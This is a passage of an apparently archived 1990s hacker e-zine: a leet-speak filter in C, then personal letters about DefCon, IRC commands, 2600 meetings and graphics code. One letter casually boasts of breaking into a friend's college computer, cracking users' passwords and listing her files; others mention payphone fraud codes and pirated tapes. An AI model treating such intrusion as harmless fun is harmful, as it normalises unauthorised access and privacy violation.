else if(!strncmp(word, "m4h", 3)) fprintf(out, "my");
else if(!strncmp(word, "iz", 2)) fprintf(out, "is");
else if(!strncmp(word, "stewpid", 7)) fprintf(out, "stupid");
else if(!strncmp(word, "reaiiy", 6)) fprintf(out, "really");
else if(!strncmp(word, "klueless", 8)) fprintf(out, "clueless");
else if(!strncmp(word, "kan", 3)) fprintf(out, "can");
else if(!strncmp(word, "wewp", 4)) fprintf(out, "woop");
else if(!strncmp(word, "telko", 5)) fprintf(out, "telco");
else if(!strncmp(word, "eye", 3)) fprintf(out, "i");
else if(!strncmp(word, "chooze", 6)) fprintf(out, "choose");
else if(!strncmp(word, "eleet", 5)) fprintf(out, "elite");
else if(!strncmp(word, "muzt", 4)) fprintf(out, "must");
else if(!strncmp(word, "buzy", 4)) fprintf(out, "busy");
else if(!strncmp(word, "ewe", 3)) fprintf(out, "you");
else if(!strncmp(word, "tew", 3)) fprintf(out, "too");
else if(!strncmp(word, "muh", 3)) fprintf(out, "my");
else if(!strncmp(word, "pheel", 5)) fprintf(out, "feel");
else if(!strncmp(word, "oph", 3)) fprintf(out, "of");
else if(!strncmp(word, "giph", 4)) fprintf(out, "give");
else if(!strncmp(word, "sum", 3)) fprintf(out, "some");
else if(!strncmp(word, "timez", 5)) fprintf(out, "times");
else if(!strncmp(word, "gewd", 4)) fprintf(out, "good");
else if(!strncmp(word, "ur", 2)) fprintf(out, "you're");
else if(!strncmp(word, "fuqed", 5)) fprintf(out, "fucked");
else if(!strncmp(word, "yer", 3)) fprintf(out, "your");
else if(!strncmp(word, "rox", 3)) fprintf(out, "rock");
else if(!strncmp(word, "yew", 3)) fprintf(out, "you");
else fprintf(out, "%s", word);
}

void
main(argc, argv)
int argc;
char **argv;
{
FILE *in;
char buf[100];
register char *t;
register int i;

if(argc == 3){
if((in = fopen(argv[1], "r")) == NULL)
usage();
if((out = fopen(argv[2], "w")) == NULL)
usage();
}else if(argc == 2){
out = stdout;
if((in = fopen(argv[1], "r")) == NULL)
usage();
}else{
in = stdin;
out = stdout;
}
while((fgets(buf, 99, in))){
for(i=0;i<strlen(buf);i++){
if(buf[i] == '4') buf[i]='a';
else if(buf[i] == '3') buf[i]='e';
else if(buf[i] == '1') buf[i]='i';
else if(buf[i] == '!' || buf[i] == ';') buf[i]='l';
else if(buf[i] == '0') buf[i]='o';
else if(buf[i] == '$' || buf[i] == '5') buf[i]='s';
else if(buf[i] == '@') buf[i]='a';
else if(buf[i] == '7') buf[i]='t';
else if(buf[i] == '+') buf[i]='t';
else if(buf[i] == '\n') buf[i]='\0';
buf[i]=(char)tolower((int)buf[i]);
}
t=strtok(buf, " ");
filter_word(t);
fprintf(out, " ");
while((t=strtok(NULL, " ")) != NULL){
filter_word(t);
fprintf(out, " ");
}
fprintf(out, "\n");
}
fclose(in);
fclose(out);
}



<---------------------------------------------------------------------------->

A Lamer's Review of DefCon
by Zeed

You don't know how happy I was when I saw you come into #devo. I couldn't
believe my eyes. I had been trying to find out your email address from just
about everybody.
Well, now I know it ;)

How was your summer? I remember you said it was pretty cool.

My summer was my trip to CA, AZ, NV.
For the first 2 weeks, I stayed in California. I went to the beach, went to
trendy coffee houses, played pool in smoke infested game parlors, visited old
friends, went to malls, cruised around, talked to people on the phone, spent
money, etc..

It was fun, I was with my friend Brian most of the time. (You spoke to him on
the phone) I didn't meet Jill or Tiffany. Each for different reasons.
Jill didn't come to CA until like 2 days before I was to leave CA, and
Tiffany was 9 hours away and every time I tried to call her she was never home.
I think you were the only online friend I called the whole time I was there,
well Jill called me once. Anyways, I am so glad I got to talk to you.

When I was in CA, I went and saw some of the old houses I used to live in. We
drove by ,my old friend, Mile's house. I don't know if it was good timing but
he was outside and we stopped and talked to him. It had been ages since I had
talked to him.

My friend Brian is off in AZ at a technical school called, "High-tech
institute"
. It's a 1 year degree in eletronics I think. Then he is going to
Australia for a year. His dad is Australian. He is turning into a party animal,
hehe. Those damn roomates of his ;)

Hmm, lets see....
Well here is the defcon summary.

Ryan, Brian and I arrived in Las Vegas around 5:00pm thursday afternoon..
I got our hotel room and got all our bags in the room.
At like 8pm we drove to the Airport to pick up Melanie, Jake and maybe Brett
(if he showed).
Well first we went to Melanie's gate and soon we met up with Jake. We both
recognized each other cause we had each others pics.
The Melanie's flight came in.
She met us all and then we were off to the Hotel.
The first night we just talked a lot in my room, then we all went to eat at
some restuarant at the Excaliber. We talked a lot there.
Jake was really funny, he is out going and had all kinds of funny stories.
Btw, Brian, Ryan and I are all 18.
Jake is 21, and Melanie was 23.
Well we came back to the hotel we went for the Casino.
Jake got some beer and he got one for Ryan.
Melanie went off to play the Quarter slots, and Jake went to Drink and play
video poker.
Brian and Ryan were being told to leave the casino cause they weren't 21, so
I gave Brian a key and I went to where Melanie was playing the slots.
I played them too, for a while. Personaly, I don't see how anybody could get
addicted to it. hehe, maybe thats cause I have a slot machine in my room ;)
Melanie was doing pretty weel actually. We just played and played, until one
of the old ladies asked if I was 18, so I had to leave.
We all went to a couple more casinos..
Melanie followed me back to the hotel room.
We like watched TV.
We all went to sleep soon after that. Melanie had her own bed, and Jake,
Brian and Ryan insisted that I take the other bed. Though I told them they
could have it. It felt good in a way, I had been sleeping on the floor the
whole 2 weeks in CA.
Well the next moring we woke up (Isn't that a surprise) =)
We all got registered at the Defcon exhibit room.
I went and hung around Defcon, because I started noticing a bunch of familiar
faces. I talk for a long while.
Melanie is down with me soon and she spots Zoop.
Zoop was surprised to see me there, he is only like 16.
Zoop told me that he had been looking for Emily and Jason.
Zoop told me that Emily was wearing a t-shirt with a happy face on it.
Later I was sitting at a table in the casino with Melanie, Zoop and Brian,
and to my total surprise some guy introduced himself as "Andy Conov" to Mel.
I was yelled out "Andy!!"
"This is Zeed" (You see, Andy and I are always online at night trading hacker
stuff, he is a good friend)
He didn't believe it was me at first.
He says: "I was expecting Zeed to be a short little guy, hehe"
I talked to Andy a long time, and you know. Andy was actually pretty much the
way I imagined him.
Anyways, Mel, brian,ryan and I all went to the Hard Rock Cafe to eat dinner.
Right before we left to walk to the parking lot, I spotted a tall nice looking
girl wearing a happy face t-shirt. I recognized her face from a gif too.
I stopped her dead in her tracks and said:
'Emily?!?"
"
This is Zeed!"
I noticed this tall short haired guy in the background behind Emily staying
his distance
from me.
I said "
Is that Jason?"
She said "
yes".
He like was trying to not get near me.. (We didn't always get along, hehehe,
I think he though
I might start something with him)
Well I gave her my room number and she gave me hers.
I told her that we were off to eat dinner and that we will be seeing each
other soon.
Well, we ate at the Hard Rock Cafe. I had a veggy burger ;)
Then we got back to the hotel room.
Brian, Ryan and Melanie kind of were ready for bed. I wasn't.
So I went to hang out at the Defcon room, there I met up with Zoop again.
We we watched Hacker Jeopardy, and Jake was a contestant.
They were like handing out beers and stuff, it was a really lax enviroment.
People were just having pure fun.
In that room though were all kinds of neat people.
Winn Shwartu, he is the Author of "
Information Warfare". He was the host of
Hacker Jeopardy.
The producer ot the movies "
War Games" and "Sneakers"
Erik Bloodaxe, famous hacker from the Legion of Doom
Dan Farmer, the Author of SATAN
and others...
During hacker jeopary, I won a free t-shirt cause I was the only person who
could asnwer one of the questions. It was relaited to video games so =P
Well Hacker Jeopary started winding down and beers were everywhere.
Right before we left, Zoop grabbed one for himself.
Zoop and I explored around the casino a while.
Andy found us again, and we all hug out in the lounge where they were playing
music.
Andy and his friend from montana were a little tweeked though ;)
His friend tried to climb one of the fake palm trees in the lounge, hehe.
They were both acting really silly.
We talked some more.
Then Andy and his friend took of to go back to their hotel, Circus Circus.
Zoop and I went to the excaliber to eat.
There, Zoop talked about some AOL secrets and I talked about some internet
ones.
I ordered a Chicken Quasedilla =9 It was too spicy though, hehe
Well, I finally got back to the hotel room at around 4am.
Everybody was sound alseep, I was afraid I might step on somebody, hehe.
A room for 2, with 5 people sleeping in it.

Well the next moring we hung out at the Defcon room again, and I met up with
all my friend form the Los Angeles 2600 meetings, it was cool.
While I was schmoozing around Defcon with my friends, Melanie won about $400
on the quarter slot machines.
It was this day that I noticed that maybe she wasn't having so much fun at
defcon.
(it's a long story, but in the end it turns out that she wanted to do more
thigs with just me)
(She didn't talk much, or say much. So I didn't know really she wanted to do)
(Though I did arrange a trip to a Dolphin show at the Mirage. )
(I think it was just a bunch of weird personal feelings about each other)
(I had kind of brought things down to a "
friends" level before we met at
defcon)
(I did give her a big hug though, and a little silver dolphin necklace, cause
she loves dolphins)
(It's a long story, I don't know if you care to hear it or whatever.)
(I guess I had fallen in love with Melanie without even meeting her or even
knowing what she
looked like)
(About 2 weeks before defcon, I kind of freaked out and slowed things down
majorly)
(I got so depressed over the whole thing, cause I knew I was making mel hurt
inside so much)
(She really wanted me to be her "
close" friend, we had even made plans to be
roomantes in OK)
(It was so hard to watch her feelings get hurt and for her to be sad, the
worst feeling of it was
that I was causing all this)
(The reason I mention all this now and here, is because this all had a major
impact on what
went on during the days in vegas.)
(It's still a painful thing for me, and something were I made lots of stupid
decisions)
(It's my fault, I am 18, never had a girl friend, and all this was just new
to me)
(btw, please don't talk about this to anybody)
(Maybe you understand? :)
Well where was I....
Oh yeah, well I met up with Andy and Zoop again.
We all talked, and had lots of fun.
My friend Ryan from San Jose even bumbed into one of his old friends.
I went into the speaking room to record the speakers.
Well, the first thin I here is:
"
John! come here."
I turn around and it is Emily, sitting next to her friend Rudy (He was sort
of her chaperone).
I sat down next to Emily for a while, odly enough I don't remember saying
much to her.
Then she left a while later.
I met up with Mel and Brian in this room while I recorded the speakers.
I saw Emily come in with Jason and they sat down somewhere else.
all of a sudden..
"
FED!!!" (Somebody had spotted a fed)
So Dark Tanget grabs the microphone a begins to interogate the fed, hehe.
So the guy whips out his Badge and waves it around showing it to everybody.
He gives his little resume type thing to Dark Dangent, and it turns out this
guys is a US Customs Agent.
Some of the speakers included:
an ex-CIA case officer.
ex-FBI director of computer division.
Computer security specialist.
There was even a little bit on women hackers. (They like profiled some women
form IRC)
and more neat people ;)
Well then things wound down...
Emily, Jason, and their friend Rudy(not akira) came up to my room)
It was a delicate situation, I knew that Melanie didn't really think all too
highly of Emily. Also,
Melanie even admited to me that she is jealous of girl I talk to(This was on
aol she told me this
once). So I knew it might be a weird situtation.
But, Emily really wanted to meet Melanie.
Well Emily was really friendly with Melanie, and I thought it worked out ok.
Thoug mel didn't say
much.
This gave me time to take pictures of Emily, hehe ;)
We all talked for a while..
Then they had to leave, and mel and I went to play slots.
She won more money, hehe, but then they kicked me out of the casino.
I went with Melanie to our room.
She started talking to me about if I was going to visit her in nov. out in
Oklahoma.
I was explaining to her that my parents might be moving again, and that I
have no idea and that I
can be certain that I will be able to do anything.
Well, in the middle of our little intimite conversion, Brian comes back to
the hotel room.
Brian and Ryan are telling me all these stories about seeing Elvis walking
down the street.
I could tell Melanie wanted them to leave..
Anyways, they left, but then Andy came knocking on the door a couple seconds
later.
I started talking to Andy and Melanie pretty much bolted for the door not
saying where she was
going.
This at the time had me thinking that Melanie really disliked me or
something. (I later found out,
that she left cause she was going to break out in tears =\ )
(She thought I was rejecting her or something, it's so complicate though, I
can't explain it all
here) (I am still somewhat confused by it all)
Well at this time though, I though she wanted no part of me. So I went off
with Andy back to the
convetion.
There I met up with Brian and Ryan and we watched hacker jeopardy.
It was a blast, they were giving away all kinds of free stuff, and of
course.. beers =)
Ryan took me to the Luxor and showed me their giant Sega Arcade.
The I met up with Brian, and Ryan went back to the room to sleep.
I met up with a friend that I know from the New York 2600 meetings, Sid (Sid
Vicious).
Well around this time Jake came up to me and asked me if I wanted to go with
him to this huge
bachlorette party in the hotel somewhere. hehehe, I didn't exactly give him a
yes or no answer ;)
I said "
Umm, let me find Brian"
By the time I found Brian, Jake was gone. Don't I just have all the luck? =)
Well Brian, Sid and I went around, checked out the hot tubs, hehe, Naughty
hackers were in the
hot tubs.
So then we went to the food court and we got some food.
Then we played a few slot machines..
All this time we were trying to find something to do, or at least find Jake.
Well Sid split up from us, and Brian and I just went and had something to eat
a drink again.
We talked a majorly goofed around. I was so tired and hungry, I must have
looked like a zombie.
I was like wired, my sentences hardly made any sense, and Brian and I talked
like 15 minuts
straight on some formula for Artificial intellegence on a computer. We were
wacked.
Well Brian and I went back to the hotel room, and we both agreed that we
would both take
Melanie to the Airport.
We woke up, and Melanie was like all packed a ready to go.
So I got ready, and the 3 of us went to the Jeep and drove the Airport.
Melanie hardly said a word.
Well we got to her gate and everything, I put her lbag beside her.
I said: "
Well, I hope you have had a fun time here Melanie, I know I did..."
She just said"
Yeah, it was fine."
I didn't really know what to do, so I said goodbye and Brian and I left back
for the hotel.
(I found out later that she wasn't really mad at me, just upset that I didn't
do more with just her.)
(I really wish she conveyed her feelings better though, I mean.. I am shy,
but even I make
suggestions, espcially if this person is your best friend(As melanie says I
am to her))
(Melanie told me later that she cried on the plane trip back)
(I feel sooo bad :( , what could I do?, it was like the toughest situation I
had ever been in)
Well.
We wrapped up the day, I met Andy at the last minute and gave him his stuff
her left in my room.
I said goodbye to all my friends at Defcon...
And we headed back to Arizona.....

I am really sorry Mazzie if I really ruined this whole thing with talking to
you about Melanie. It's
just been in my mind a lot, and well I guess a lot of people probably
wondered about Mel and I.
We were like the center of a bunch of stupid rumors.

I have many mixed feelings about Melanie right now. I think she went a little
to far, but I guess it
is my fault for getting her so envloved with me.
Melanie is my friend, and I had been talking to her a lot, trying to make her
feel better and be her
friend up til a week ago. (Now there is a huge new develpomenet with Melanie
that doesn't
evolve me.)
I like her a lot as a friend, but I know now that she is not the girlfriend I
want.
I am really confused right now, and not sure where my life is leading.
I really don't want to burden you with my crazy life problems though.

I am just happy that I have somebody like you talk to. You don't know how
much I appreciate
having friends like you.

Well anyways.. enough of that stuff..
Here is some other info.
Do you have a www browser like Netscape? or something?
I have my WWW page set up, it's still in developement though.
Check it out :)

Umm, I would love to put your picture on my web page, but I am not going to
do it without your
permission. If you don't want to, I understand. I just made a little section
for my friends picture,
soon that section will have my new picture on it too.

Well, how is Mazzie the IRC queen comming around?
Know all the commands yet? hehe
Here are some commands you could use:
/join #devo (Join devo channel)
/mode #devo +o Zeed (if you have +o (operator powers) you can give them to
others
/load textbox.irc (If you still have textbox.irc, it's a neat script, you can
go into multiple channels
at once)
you could do:
/join #devo
/join #pain
/join #hack
And you would be in all three channels.. Though when you typed it would end
up in #hack,
because thats the latest room you switched to.
To switch between rooms (When you have textbox loaded) just type
/join #devo or whatever. Now you would be tlaking to #devo. But you did not
leave those other
channels.
To leave a channel do this
/leave #devo

is you see somebodies nick and you want to know a little more about them ,
type:
/whois zeed or whatever nick.
(note their domain name, like Orange@nether.net)

You can execute unix commands from IRC.....
use the exec command
/exec <command>

since finger is a unix command, you could do this.


Finger shows you info about me and my system. Not all people have finger info
though.
If you want any info for when people finger you, edit a file in your unic
directory called .plan.
you could put what ever you want in it, that file is shown to people who
finger you.

if you want to see who is in a particular channel do this

/who #devo

Each channel can be programmer with different mode.
You might see something like this:
Zeed has changed the mode to #devo to +i

Well this means I made the channel invite only, meaning that I have to use
the /invite command
to let them in.

here are some more modes:
+t This controls who can set the topic in the channel. if it is +t then only
+o people can set it.
+s This makes your channel a secret channel.
+n This makes it some people can't write messages to the enitre channel.
+m This makes the channel mediated, where pretty much only people with +o
can talk in the
channel.
+l L sets a limit on the number of people who can be in a channel.

you set the mode by doing this for example.

/mode #devo +s

if you want to take a mode off, just do this:

/mode #devo -s

To change the topic in the channel you can do this:

/topic #devo Mazzie is the greatest.. (This makes the topic = Mazzie is the
greatest..) =P


ok, one problem with IRC though is that has what we call "
lag"
Sometimes it's less then a seccond. other times it's a lot longer.

When you use IRC you are hooked up to a irc server.

irc servers are what get lagged..

What you want to do is avoid the lagged servers and go on the fast ones.
If your server slows down while you are on it you want to change servers.

one way to see how big the lag is by "
pinging" somebody

if you did:

/ping zeed

and it respunded with: 3 seconds.
The we are doing ok.
If you never get a ping respounce, or if it ends up to be like 200 seconds,
then you have trouble ;)
A ping is like a echo bouncing of something.

Anyways, to change servers you use the /server command

/server irc.escape.com would work. There is usually a little delay between
switching servers.

Here are some fast servers for irc.

irc.escape.com
sgi.texas.net
irc.texas.net
irc-2.mit.edu
irc.eskimo.com

Hmm, what else.....
oh, to send private messages to people on IRC.

you use the /msg command.

like I would do this

/msg mazzie Hey cutie!

Private messages look a little different then channel messages.
When you are using textbox, private messages will beep too.


Thank you for attending Jean's small course of IRC 101.

=)

wow, I have been writing this for like 3 hours.. hehehehehe
oh well.

Say "
hi" to all your roomies for me :)
and I hope you saved me a piece of pizza, because I am going to meet you one
day >=)
hopefully at least =P

Well, I am going to get duplicates of this film from defcon, and i'll send
you all kinds of neato
stuff :)

I hope college isn't going to be too hard for you =\ I know you will do well
though. You are very
smart :)

See you soon, {{{{{{{{{{{{{{{{{{{{{ Tabitha }}}}}}}}}}}}}}}}}}}}}
Happy birthday!!!

Love,
Jean-Christophe (isn't french just spiffy?)
=)



PS: As you know I have changed my phone number some time ago, did I give you
the new one?


{{{{{{{{{{{ Mazzie }}}}}}}}}}}}}


Sorry if I rambed on, or made no sense what so ever ;)
It's 8:00 am here, and I had been working on my web page all night, but I
just had to write you!


------------------------------------------------------------------------------

A Confession of Stupidity
by Zeed


I bet you didn't know I was much of a hacker? :)
I don't usually talk about hacking with you...

Well this morning I was bored, and so I decided to take a loot at your
schools computer. I was just nosy ;)

Anyways, I broke in =P
I have the entire password file for your whole college...

Mind you though, the passwords are encrypted and so I had to run my different
programs on the password file to help me unencrypt it...

All I can say is "
bravo" you must have picked a good password. ie. one that
isn't a word in any language. I couldn't crack yours, if i had I would have
just showed you it for amusement thats all ;)

I did crack lots of other, not so wise people's passwords.

Hmm, you don't believe me.. That I broke in? =P
Here is your home directory with all your files in it ;)
---
/u/s/tgreiner
% ls
mail textbox.irc
% ls -la
total 307
drwxr-xr-x 3 tgreiner 512 Aug 29 22:12 .
drwxr-xr-x2025 root 36352 Aug 30 09:03 ..
-rw-r--r-- 1 tgreiner 0 Aug 27 13:32 .addressbook
-rw-r--r-- 1 tgreiner 1257 Aug 27 13:32 .addressbook.lu
-rw-r--r-- 1 tgreiner 29 Aug 17 1993 .bash_login
-rw-r--r-- 1 tgreiner 25 Aug 17 1993 .bashrc
-rw-r--r-- 1 tgreiner 24 Aug 17 1993 .cshrc
-rw-r--r-- 1 tgreiner 320 Aug 29 22:13 .history
-rw------- 1 tgreiner 0 Aug 28 21:09 .ircmotd
-rw-r--r-- 1 tgreiner 24 Aug 17 1993 .login
-rw------- 1 tgreiner 22925 Aug 27 13:33 .pine-interrupted-mail
-rw-r--r-- 1 tgreiner 5433 Aug 29 22:12 .pinerc
-rwxr-xr-x 1 tgreiner 21 Aug 17 1993 .profile
drwx------ 2 tgreiner 512 Aug 26 21:11 mail
-rw-r--r-- 1 tgreiner 221435 Aug 26 21:05 textbox.irc
%
--------
Now, don't worry :)
I am a good boy, I won't do anything bad to this computer :)
It's the same deal with that college in Vancouver I might be going to, I
already broke into their's too. I leach stuff off of it, but I have and never
will damage it. I am sort of their protector.

You have to admit that I am the the everyday type of hacker you see in 'hack'
, eh?
I am just being silly =)

But, I get a cookie for being a good hacker don't I? =)

Well I hope things are going good with you.. I hope school is fine :)
I sorted out the pictures I am going to send to you...
I am going to put some other stuff together, and send it off ;)

Love,
Jean


btw. 'ls' is the command in unix that shows you what files are in your
directory ;)
I noticed that the only commands you had typed were:
irc
exit
pine

Am I being too nosy? Sorry, hehe. I just had to show off my latest hack =)

-------------------------------------------------------------------------------
My Night With a Narq
by Zeed

Just thought I would say "
hi " ;)

I another went to a NYC 2600 meeting last night, it was a lot of fun :)

I swear I might only go out and do something fun once a month, but it's worth
it :)

Lets see..
First I hung out there and talked to my friends about the normal hacker
stuff, it's kind of neat. I can see some of the little lamers looking at me
in the background looking at me like if I was some sort of hacker god. Here I
am with like 6 people around me most of them are at least 10 years older then
me and we are all talking about the latest tricks and things. I had my defcon
t-shirt too, so I was elite ;)

Anyways, I was there talking and Evian walked by me and rescued me from that
crowd. She just walked by me and grabbed my shirt and I thought, hmm, who
would I rather talk to right now.... A bunch of middle age hackers or one of
my friends, so I left the crowd of hackers. I went with Evian and sat down, I
showed her all my pictures from defcon. Now she officially knows what My 2
friends from CA , Jason, Emily, Melanie and Andy Conov look like. It was fun
:) I didn't have too many cool pictures. The one thing that sucked though was
that Rage and Plot said that they were both going to show up. They never did
though, so Evian and I tried calling up Rage to see what was up. We were like
using all these codes and things to try to make calls, the damn payphones
kept eating her quarters. hehe, they are getting us back I guess.

Well Plot and Rage never did show up, oh well..

Oh, lets see, who else was there....
Do you know Cameo (Davi, mistressx, etc) she was there all the way down from
Mass. (6 hours away). She was nice to talk to, she was a lot more prettier
then her friends would tell me. I didn't talk to her though a lot, between me
and you, she is sort of a hacker groupy I think. She just goes to whoever
seems most 'elite', thats how I met her origonaly. I was on aol a couple
weeks ago and KT, Next, and some others were like calling me the god of the
internet, etc... Odd, enough I got an IM from here a couple minutes later,
and I ended up calling her. I am not saying that she isn't a very sweet
person, it's just I wasn't always so 'elite' or knowledgable and people would
never wanted to talk to me and my friends. Now it's funny, it's like people
just want to 'know' me. I did talk to her a while, but she mostly talked
about hacking. I really would usually talk about other things then computers
with my friends, hehe, they are so boring ;)

Lets see, Evian is much more sincere of a person. We both sit there making
fun of the "
elite" people walking around the meeting. She is neat =)

Hmm, I met another girl there, maybe not as old as Evian(like 28) but maybe a
little younger. I don't know why she wanted to start talking to me, maybe
it's my new hair cut ;) She was interesting though, she like sets up WWW
servers and enviroments, which I thought was cool because thats what I am
sort of trying to do. (Trying, because it requires $$$) I think I am
becomming more comfortable about meeting people and meeting women (I am very
shy), but I was kind of surprised she started talking to me. If I do move to
Vancouver in Januaury (it's very likely) I am going to miss these people,
they are so nice, all of them.. I hate moving =`(

My friend that I like see every month (The OMNI magazine reporter) was there
again. He talked to me a little while, hmm, maybe he is writing a book on me
;) He like mostly talks to me.. hmm.

There was also a NY times reporter there with her photographer. My friend PMF
(He is originaly from Brittain) went off on hacking for like 30 minutes
talking to this reporter. Talking about the difference between hacking and
phreaking, he was having his day in the sun. He has got to be one of the most
knowledgable people I know when it comes to hacking. I bet he is going to be
all over the NY times. Then the photographer was going crazy with taking
pictures..

This other guy I know "
Dennis" (Elite entity, he probably one of the most
notoruis hackers here other then Phiber Optik) started really harrassing the
photographer, he was telling me how pissed he was at her taking pictures. He
was also VERY drunk, I left right when she called a security guard on him. I
wonder what happend.

Anyways, PMF, DTMF and I all went to Mac Donalds (It's three stories high ).
I talked with them about all sort of things, PMF seems to know just about
everything :)
He could pull credit reports, change your phone number, find out all kinds of
goodies ;)
He got busted though for breaking into a System 75, so he a lot more
cautious.

We went back to the meeting after Mac Donalds but everybody was gone..
So DTMF took his subway, and I went with PMF on the subway to 42nd street.
Now if you know about NY you know about 42nd, you can pretty much get
anything there. It has like a bunch of adult theaters and movie stores on it.
Anyways, we went there to go get some pirated movies. PMF knew 2 places there
that had movies like Mortal Kombat and Clueless already on tape. I bought
mortal kombat for $10 just to see what the quality would be like, it's more
of a novelty item for me. PMF got a couple moves. BTW, PMF is 24. Hmm, I
don't know if I should tell you this ;)
We did go into n adult movie place, he was like looking for a particular
movie.. I just followed him in. I was sort of amazed at how much of that
stuff they sell in there. They had 1000s of videos, umm, and a bunch of weird
other things, some I have yet to figure out ;)

We didn't stay long, and I don't even know if I was old enough to be in
there, but really didn't care. I was in NY just to have fun and to get out. I
think they were ready to card PMF, but they never really looked at me. Hmm,
must be all that facial hair ;)

Anyways, after 42nd st, we tooka subway to out train.

We almost went on the wrong train!!
We were there sitting on the wrong train for like 30 minutes.
2 girls came on the train and asked us if this was the train to Morristown.
PMF says "
No this goes to Suffern NY, but you can come with us" He is such a
joker :)
So they got off that train..

10 minutes later the 2 girls come back and say "
Umm, This train is going to
Morristown, but you guys can could with US" (hehe, roll reversal)

So we got off that train and jumped on the right train.

Soon we were off, PMF got off at the 3rd stop.
I stayed on till my stop wich was a lot farther down.

I had lots of fun :)

hehe, my life is so meager isn't it? ;)

All I did was hang out, go to mac donalds and bought a pirated video. Well I
did meet some new people.. But, thats all it took for me to have fun ;)

Well, I am going to have these pictures duplicated soon. Would you like a
picture of me too? I have some of me at defcon, but they aren't terribly
good.

I hope everything is going well for you, and all that school work isn't
killing you.

Love,
Jean
------------------------------------------------------------------------------
Creating Your Own Startup Computer Company
by Zeed



I was bored out of my mind in math class....

So I started designing my company out ;)

I could bore you with all the technical stuff, I will spare you.

I started designing the logo, the corperate head quarters, everything ;)
I am going to do business in europe, taiwan and Japan.

The reception area to the company is going to be a big room, with arcade
games on lined up on both sides. and a huge "
Zeed Enterprises" logo painted
on the floor.

I have like everything planned out.
I even have a list of people I need to hire to work for me.
programmers, artists, musicians, etc :)

Zeed Enterprises,
Software developement for the:
PSX, Saturn, SNES, Genesis, Win '95, Amiga 4000, UNIX.
Internet service provider and www server provider.
UNIX security analysis and auditing services.

Thats like what my business card will say ;)

All of this pretty much hinges on if I get accepted to that school in
Vancouver, Canada.
If I don't, I am going to probably go more heavily into just Sega Saturn and
UNIX and Unix security.

Look out Acclaim, Sega and Nintendo =P

Here I come :)

ok, there was my grandious delusion.
It's going to happen though >=) That or something better.

I have very high goals for myself, when I don't achieve them I get depressed.

I am imagining this all in Southern, CA , maybe Northern , CA.

Hmm, well today I am going to get some things done..

I have to finish two programs for this school in Vancouver (I am going to
brag to them =P)

One program is a small game, and the other is a 3-D demo I am working
on(right now it's just all in my head).
The little game is about %75 done.

The game is written in C, and I haven't decided if I am going to write the
demo in Intel assembley language or in C. Yuck!! floating point math and trig
in Assembley, ahhh!!
shhh, don't get mad at me, I am just getting corny, I know you could care
less about floating point math ;)

Well my 486 is running, so I am in the slow rebuilding process.
Oh the joys of PCs.

My next computer will be a Silicon Graphics workstation, hell with this
microsoft crap ;)

umm, I am talking about computers too much...

I think I will interrogate you >=)
What type of music do you like?
Did you ever have pink fuzzy bunny slippers when you were a kid?

some interogation... So much for my lawyer career.

Guess what? My dad is in Saudi Arabia right now =P
Talk about long distance calling.

Sorry about not pestering you for the last couple days...
I couldn't use AOL or anthing, not even Windows. So I was unable to bug you
with my ever so timely email. I'll make it up to you though, I promise.

Did you miss me while I was gone? I thought so.. :) hehehe

When I go away for extended periods of time everybody misses me. Then a
couple days later after I come back, they wish I'd leave again =)

You know, every time I think of your real name, I think of "
bewitched".
Nooo, don't hit me, I know that I am probably like the 1 milionth person to
say that to you. I just had to say it ;)

Well, I must leave now...

I do believe I have work to do if I am to start a company in 2 years.
a bien tot.

Jean


John, John, the leprechaun, went to school with nothing on..........
(I hated that stupid saying, I heard it like every day in first grade)

------------------------------------------------------------------------------
Graphics Research
by Zeed

Whats new?

Man, I have been programming all day log.

I woke up this morning and before I even opened my eyes, I was thinking about
this program I wrote. It had a major bug in it, so I was debugging it in my
head. I fixed the bug in my head, opened my eyes and grabbed a piece of paper
and wrote the entire sub-routine for this new function.

This function rotates a 40 by 80 pixel box and maps it into a 100 by 100 box.
So I had to develope an algorithm that would rotate the entire image
according to how many degrees I tell it to rotate. This envovled some
trigometry.

Here I will show off to you what I wrote this morning, right when I woke up
;)

----------------------
int rx,ry;
float cx,cy;
float sx,sy;
int sxx,syy;
unsigned char col;
float cc,ss; /*cosine and sine value so we dont have to calculate more then
once */

for(rx=0;rx<10000;rx++) swap[rx]=0; // clear out buffer

angle+= .1;
for(ry=0;ry<40;ry++){
for(rx=0;rx<80;rx++){
col= buf[ry*80+rx];
if (col!=0) { /* don't rotate if pixel has no color */
cy= 20 - ry;
cx= rx - 40;
cc= cos(angle);
ss= sin(angle);
sx= cx * cc - cy * ss;
sy= cy * cc - cx * ss;
sxx= sx + 50;
syy= 100 - sy - 50;
swap[syy*100+sxx]= col;
//vmem[(((syy+16)<<8)+((syy+16)<<6))+sxx+17]= col; //to bypass plotbk
}
}
---------------------------------

yeah, I am sure you understood all of it ;)

This is C by the way

umm, btw. An admin at your college found out about me about an hour ago.
He just kicked me off and changed my password. oh well :)


where was I? oh yes, the algorithm..
Would you beleive there is still a bug in it somehwere, ahhhhh, I hate
debugging.
I guess that means I shoulded just write big free code.

A weird thing happend on AOL today, I met two girls right after another..
Both IMed me first and both just started talking to me.
I am becomming sort of a famous person, hmm, like you :) hehehe.

I think you have heard of both of them, whats werid though is that I did not
know either before today. Just heard of them.
Quagmire and Jill from TX.
Quagmire is nice.
Jill, well she is just a kid, and besides, I thought I remember hearing stuff
about her a while back ;)

It never hurts to meet new faces though, thats just my little story though. I
popped intho 'hack' for a second and I get people IMing me. I usually ignore
all the guys, unless I know them.

Sheeesh, me and my online friends, I am just going to get myself into another
bad situation. I swear, I am building this like huge library of pics of my
friends, hehehe.

I guess I am not going to be seeing "
hackers" this weekend. Evian called me
last night and said she was doing stuff with her family or something this
weekend. Oh well :)
Will you come with me to see it? hey, it's the thought that counts :)

I am going to play psycologist for a second. Tell me if I am wrong.
I get this feeling about you...
Like you like talking to people online and stuff, and being their friends
because it's online only. You don't have to worry about anything else, and
they are there whenever you need them. I am not saying that you don't have or
like friends in the flesh world. I am just thinking out loud. Do you like the
thought of ever meeting anybody you have met online in person? or does that
scare you somewhat, or maybe you think it will shatter your own little
makebelieve world. I am just curious.
I was doing a lot of thinking on my part about myself. Please do not take
this the wrong way. I could have asked it to anybody. I am just like I said,
comming up with theories and poundering them ;) I am just wondering what your
opinion is.

My sympathese are with you... (all that homework)

Take care..


<---------------------------------------------------------------------------->


Thus concludes FEH #4. See you again in a month or two.

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

